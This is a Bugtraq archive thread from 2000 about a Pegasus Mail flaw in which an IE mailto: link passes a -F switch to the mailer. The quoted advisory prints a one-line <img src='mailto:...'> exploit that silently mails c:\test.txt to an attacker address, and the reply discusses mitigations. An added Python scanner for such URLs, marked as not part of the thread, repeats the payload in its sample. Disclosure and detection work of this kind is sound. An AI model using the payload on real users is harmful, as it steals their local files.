Bugtraq mailing list archives
Re: Pegasus mail file reading vulnerability
From: George Bakos <alpinista () BIGFOOT COM>
Date: Wed, 4 Oct 2000 10:34:05 -0400
The temporary fix stated by Mr. Ghory affords only a brief dialog flash. Not a very good fix. A better one is to NOT configure Pegasus to be the default mailer for IE. This is, unfortunately, a user-specified option at install time, not the default. Also, queuing of outgoing mail allows for pre-delivery review. A pain, but until David supplies a fix, this is it.

Be aware, the -F switch will only include a file in the body of a message; it will NOT attach a binary. The -B switch will accomplish this from the command line, but not via IE.

It seems this is more of an IE mailto: implementation issue than a Pmail one. I wonder how many other apps you can pass command-line options to by exploiting this "feature".

On 3 Oct 00, at 16:31, Imran Ghory wrote:
SUMMARY

The default setup of Pegasus Mail contains a remotely exploitable security hole that allows a remote website to gain copies of files on the user's hard drive.

DETAILS

Version tested: Pegasus Mail v3.12c with IE5.0

When the webpage containing the exploit code is viewed using IE5, Pegasus Mail will automatically create a message which has a copy of the file "c:\test.txt" and is addressed to "hacker () hakersite com", and queue it ready to be sent without any further user intervention. If instead of "hacker () hakersite com" we have a local user, "hacker", the message won't be queued but just sent immediately.

Exploit code:

<img src="mailto:hacker () hakersite com -F c:\test.txt">

Temporary Fix:

1) Don't run Pegasus Mail at the same time as a web browser. This is not a complete solution as Pegasus Mail will load up if the exploit code is run, but this at least will be more noticeable to the user.

Vendor: As I earlier posted a message to vuln-dev giving the basics of this exploit without realizing the consequences (at that stage the user had to click on a link for the exploit to come into play), I have decided to publish the full exploit before contacting the vendor.

-- Imran Ghory
George Bakos - Security Engineer
Electronic Warfare Associates
Information & Infrastructure Technologies
802-338-3213
To request PGP public key, mailto:alpinista () bigfoot com?subject=sendpubkey or http://pgpkeys.mit.edu:11371/
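As an added defensive check, not part of this thread or of Pegasus Mail, the following scanner flags mailto: URLs in HTML that carry what look like mailer command-line switches (the pattern in the post above) and mailto: URLs placed in attributes such as <img src> where a link would never belong. It assumes the constructed sample HTML below and, as an assumption about what the browser's mailto: handler saw, decodes percent-encoding before inspecting the recipient part.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# A conforming RFC 2368 mailto: URL has no raw whitespace in the recipient
# part; a token like "-F" after whitespace looks like a mailer switch.
SWITCH_RE = re.compile(r"\s(-[A-Za-z]\b\S*)")


def analyse_mailto(url):
    """Return reasons a mailto: URL looks like a command-line injection attempt."""
    findings = []
    if not url.lower().startswith("mailto:"):
        return findings
    # Assumption: decode percent-encoding so encoded whitespace is also caught.
    body = unquote(url[len("mailto:"):])
    recipient = body.split("?", 1)[0]  # headers (subject=, body=) follow '?'
    if re.search(r"\s", recipient):
        findings.append("whitespace in recipient part")
    for match in SWITCH_RE.finditer(recipient):
        findings.append("switch-like token %r" % match.group(1))
    return findings


class MailtoScanner(HTMLParser):
    """Collect (tag, url, reasons) for suspicious mailto: URLs in any URL attribute."""
    URL_ATTRS = ("src", "href", "action", "data")

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name in self.URL_ATTRS and value.lower().startswith("mailto:"):
                reasons = analyse_mailto(value)
                if tag != "a":  # mailto: outside a link element is itself suspicious
                    reasons.append("mailto: in <%s %s=...>, not a link" % (tag, name))
                if reasons:
                    self.findings.append((tag, value, reasons))


def scan_html(html):
    scanner = MailtoScanner()
    scanner.feed(html)
    return scanner.findings


# Constructed sample: one benign link and one URL shaped like the post's exploit.
SAMPLE = r'''<html><body>
<a href="mailto:alice@example.com?subject=hi">mail</a>
<img src="mailto:attacker@example.invalid -F c:\test.txt">
</body></html>'''

if __name__ == "__main__":
    for tag, url, reasons in scan_html(SAMPLE):
        print(tag, url, reasons)
```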
Current thread:
- Pegasus mail file reading vulnerability Imran Ghory (Oct 03)
- Re: Pegasus mail file reading vulnerability George Bakos (Oct 04)
- Re: Pegasus mail file reading vulnerability Nick FitzGerald (Oct 04)
- <Possible follow-ups>
- Pegasus Mail file reading vulnerability Richard Stevenson (Oct 31)
- Re: Pegasus mail file reading vulnerability George Bakos (Oct 04)